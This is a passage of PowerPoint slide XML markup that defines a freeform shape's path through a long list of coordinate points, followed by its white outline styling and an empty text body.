                    <a:lnTo>
                      <a:pt x="1100" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1098" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1101" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1113" y="438"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1127" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1135" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1137" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1137" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1133" y="455"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1135" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1136" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1138" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1137" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1136" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1133" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1130" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1129" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="516"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1140" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1142" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1148" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1150" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1155" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1158" y="518"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1158" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1157" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1159" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1165" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1173" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1178" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1181" y="516"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1183" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1186" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1187" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1192" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1192" y="519"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="501"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1199" y="497"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="492"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1198" y="485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1198" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1200" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1212" y="466"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="471"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1221" y="479"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1226" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1231" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1238" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1240" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1238" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1238" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1242" y="521"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1247" y="534"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1249" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1254" y="538"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1256" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1254" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1251" y="550"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1254" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1263" y="559"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1265" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1265" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1265" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1262" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="570"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1252" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1249" y="569"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1250" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1252" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1256" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1258" y="586"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1263" y="587"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1266" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1272" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1279" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1280" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1277" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1281" y="618"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1285" y="616"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1291" y="615"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1297" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1301" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1309" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1316" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1327" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1325" y="634"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1320" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1315" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1310" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1304" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1300" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1296" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1288" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1286" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1282" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1291" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1294" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1299" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1308" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1317" y="644"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1325" y="643"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1329" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1332" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1329" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1329" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1332" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1336" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1351" y="664"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1353" y="669"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1351" y="674"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1351" y="678"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1348" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1355" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1352" y="699"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1347" y="702"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1339" y="709"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1334" y="712"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1326" y="713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1320" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1309" y="715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1306" y="720"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1300" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1295" y="733"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1291" y="737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1284" y="739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1273" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1260" y="743"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1250" y="742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1235" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1232" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1225" y="742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1204" y="741"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1185" y="742"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1181" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1177" y="747"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1173" y="754"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1172" y="760"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1170" y="763"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1166" y="766"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1158" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1154" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1146" y="774"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1141" y="780"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1135" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1133" y="791"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1124" y="802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1121" y="808"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1118" y="811"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1115" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1111" y="827"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1116" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1119" y="818"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1124" y="813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1131" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1139" y="795"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1154" y="785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1163" y="780"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1175" y="775"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1183" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1190" y="770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1201" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="775"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1219" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="785"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1216" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1203" y="795"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1199" y="795"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="793"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1183" y="795"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1185" y="796"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="799"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="800"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="805"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="806"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="801"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="801"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1212" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="805"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="808"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="811"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="811"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="813"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1200" y="818"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="818"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1210" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="823"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1210" y="827"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="830"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="832"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1221" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1226" y="840"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1224" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1221" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1221" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1225" y="844"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1226" y="847"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1230" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1231" y="847"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1233" y="847"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1234" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1237" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1236" y="848"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1242" y="848"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1244" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1243" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1245" y="850"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1247" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1248" y="850"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="847"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1255" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1256" y="850"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1259" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1263" y="850"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1266" y="854"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1263" y="857"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1264" y="858"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1270" y="858"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1271" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1267" y="861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1266" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1264" y="861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1265" y="862"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1261" y="862"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1259" y="862"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1260" y="864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1257" y="865"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1254" y="865"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1253" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1250" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1248" y="870"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1247" y="869"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1242" y="871"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1241" y="872"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1237" y="873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1237" y="871"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1235" y="872"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1233" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1232" y="872"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1232" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1230" y="876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1229" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1226" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1225" y="877"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1224" y="876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1224" y="873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1222" y="876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1221" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1216" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="879"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1219" y="881"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1212" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1210" y="889"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="889"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="892"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="890"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="892"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="893"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1206" y="892"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1207" y="894"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1205" y="895"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1204" y="894"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1203" y="894"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1203" y="895"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="894"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1200" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1199" y="900"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1198" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="899"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1192" y="892"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1191" y="894"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="886"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1191" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="877"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1191" y="877"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="879"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="874"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1203" y="867"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1210" y="862"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1215" y="858"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="866"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1220" y="862"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1224" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1229" y="858"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1231" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1232" y="858"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1231" y="857"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1227" y="857"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1222" y="857"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1219" y="857"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="856"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="857"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1210" y="858"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1208" y="856"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1216" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1217" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="848"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1218" y="846"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1215" y="847"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="842"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1214" y="847"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1211" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1209" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193" y="861"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1190" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="858"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1190" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1184" y="864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1183" y="863"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1176" y="862"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1175" y="864"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1172" y="861"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
